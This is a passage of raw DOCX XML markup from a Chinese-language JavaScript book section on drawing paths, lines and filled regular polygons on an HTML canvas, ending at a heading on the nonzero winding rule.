        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面所有的图都是通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码在＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上绘制的</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>一般是在一个大的屏幕外画布中绘制高分辨率（达到印刷质量）的图形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="21_4_1_Hui_Zhi_Xian_Duan_He_Tian_Chong_D"/>
      <w:r>
        <w:t>21.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　绘制线段和填充多边形</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要在画布上绘制线段以及填充这些线段闭合的区域，从定义一条路径开始。路径有许多子路径组成，子路径又是由两个或多个点之间连接而成的线段组成（或者后面将介绍的曲线段）。调用</w:t>
      </w:r>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法开始定义一条新的路径，而调用</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>方法则开始定义一条新的子路径。一旦使用</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法确定了子路径的起点，接下来就可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来将该点与新的一个点通过直线连接起来。如下代码定义一条包含了两条线段的路径：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.beginPath();//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一条新路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(100,100);//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>(100,100)</w:t>
      </w:r>
      <w:r>
        <w:t>开始定义一条新的子路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(200,200);//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>(100,100)</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>(200,200)</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一条线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(100,200);//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>(200,200)</w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t>(100,200)</w:t>
      </w:r>
      <w:r>
        <w:t>绘制一条</w:t>
      </w:r>
      <w:r>
        <w:t>线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>上述代码只是简单地定义一条路径，并没有在画布上绘制任何图形。要在路径中绘制（或者勾勒）两条线段，可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，要填充这些线段闭合的区域可以通过调用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fill();//</w:t>
      </w:r>
      <w:r>
        <w:t>填充一个三角形区域</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>绘制三角形的两条边</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上述代码（再加上一些设置线段宽度和填充颜色的代码）会渲染出图</w:t>
      </w:r>
      <w:r>
        <w:t>21-5</w:t>
      </w:r>
      <w:r>
        <w:t>所示图形：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251724800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4058728" cy="992037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="65" name="00065.jpeg" descr="000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5.jpeg" descr="00065.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4058728" cy="992037"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　一条绘制并填充的简单路径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是上述定义的子路径是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>未闭合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的。它只包含两条线段，线段的终点并没有和起点汇合。也就是，它并没有闭合一个区域。对于这样</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>未闭合</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的子路径，调用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法填充的时候，会假设子路径的终点和子路径的起点是连接起来。这就是为什么，上述代码填充成了一个三角形，但是只勾勒了三角形的两条边。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>想要勾勒出上述三角形的三条边，可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将子路径的起点和终点真正连接起来；还可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo(100,100)</w:t>
      </w:r>
      <w:r>
        <w:t>，但是，这样的话，最终表现出来的只是三条线段共用了一个起</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>点和一个终点，但并未真正</w:t>
      </w:r>
      <w:r>
        <w:t>闭合。因此，当绘制比较粗的线段时，如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，视觉效果会更好。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>stoke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法还有另外非常重要的两点。第一点是：这两个方法都是作用在当前路径上的所有子路径。假设在上述代码中再加入如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(300,100);//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>(300,100)</w:t>
      </w:r>
      <w:r>
        <w:t>上开始一条新的子路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(300,200);//</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>(300,200)</w:t>
      </w:r>
      <w:r>
        <w:t>结束绘制一条竖直线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果再调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就会绘制出三角形的两条相连的边，以及一条断开的竖直线段。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第二点是：</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法都不更改当前路径。可以调用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，但是之后调用</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法时候当前路径不变。完成一条路径后要再重新开始另一条路径，必须要记得调用</w:t>
      </w:r>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。如果没有调用</w:t>
      </w:r>
      <w:r>
        <w:t>beginPath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么之后添加的所有子路径都是添加在已有路径上，并且有可能重复绘制这些子路径。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一个函数，用于绘制规则的多边形，同时展示了如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来定义子路径以</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>及如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>toke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来绘制这些路径。最终绘制出来的图形如图</w:t>
      </w:r>
      <w:r>
        <w:t>21-6</w:t>
      </w:r>
      <w:r>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251725824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4002656" cy="1160252"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="66" name="00066.jpeg" descr="000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6.jpeg" descr="00066.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4002656" cy="1160252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para10"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">图　</w:t>
      </w:r>
      <w:r>
        <w:t>21-6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　规则多边形</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>21-4</w:t>
      </w:r>
      <w:r>
        <w:t>：使用</w:t>
      </w:r>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>closePath()</w:t>
      </w:r>
      <w:r>
        <w:t>方法绘制规则多边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>定义一个以</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>为中心，半径为</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>的规则</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>每个顶点都是均匀分布在圆周上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将第一个顶点放置在最上面，或者指定一定角度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>除非最后一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，否则顺时针旋转</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function polygon(c,n,x,y,r,angle,counterclockwise){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>angle=angle|</w:t>
      </w:r>
      <w:r>
        <w:t>|0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>counterclockwise=counterclockwise||false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(x+r*Math.sin(angle),//</w:t>
      </w:r>
      <w:r>
        <w:t>从第一个顶点开始一条新的子路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y-r*Math.cos(angle));//</w:t>
      </w:r>
      <w:r>
        <w:t>使用三角法计算位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var delta=2*Math.PI/n;//</w:t>
      </w:r>
      <w:r>
        <w:t>两个顶点之间的夹角</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=1;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>n;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环剩余的每个顶点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>angle+=counterclockwise?-delta:delta;//</w:t>
      </w:r>
      <w:r>
        <w:t>调整角度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(x+r*Math.sin(angle),//</w:t>
      </w:r>
      <w:r>
        <w:t>以下个顶点为端点添加线段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>y-r*Math.cos(angle));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();//</w:t>
      </w:r>
      <w:r>
        <w:t>将最后一个顶点和起点连接起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>开始一个新的路径并添加一条多边形子路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.beginPath();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>polygon(c,3,50,70,50);//</w:t>
      </w:r>
      <w:r>
        <w:t>三角形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>polygon(c,4,150,60,50,Math.PI/4);//</w:t>
      </w:r>
      <w:r>
        <w:t>正方形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>polygon(c,5,255,55,50);//</w:t>
      </w:r>
      <w:r>
        <w:t>五边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>polygon(c,6,365,53,50,</w:t>
      </w:r>
      <w:r>
        <w:t>Math.PI/6);//</w:t>
      </w:r>
      <w:r>
        <w:t>六边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>polygon(c,4,365,53,20,Math.PI/4,true);//</w:t>
      </w:r>
      <w:r>
        <w:t>六边形中的小正方形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>设置属属性来控制图形外观</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fillStyle="#ccc";//</w:t>
      </w:r>
      <w:r>
        <w:t>内部使用浅灰色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.strokeStyle="#008";//</w:t>
      </w:r>
      <w:r>
        <w:t>深蓝色外边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineWidth=5;//5</w:t>
      </w:r>
      <w:r>
        <w:t>个像素宽</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>调用如下函数绘制所有这些多边形</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>每个分别定义在自己的子路径中</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.fill();//</w:t>
      </w:r>
      <w:r>
        <w:t>填充图形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.stroke();//</w:t>
      </w:r>
      <w:r>
        <w:t>勾勒外边框</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要注意的是上述例子绘制了一个内部包含正方形的六</w:t>
      </w:r>
      <w:r>
        <w:t>边形。正方形和六边形是两条独立的子路径，但它们互相重叠。当出现该情况（或当单条子路径与自身相交）时，画布需要能够确定哪些区域在路径里面，哪些在外面。画布会采用</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>非零绕数原则</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>测试来判断它们。在上述例子中，由于六边形和正方形绘制的方向不同：六边形的顶点是沿着顺时针方向来连接的，而正方形顶点则是沿着逆时针连接的，因此根据</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>非零绕数原则</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，对内部的正方形不进行填充。换句话说，如果正方形也沿着顺时针方向连接的话，调用</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的时候就会对正方形也进行填充了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:t>非零绕数原则</w:t>
      </w:r>
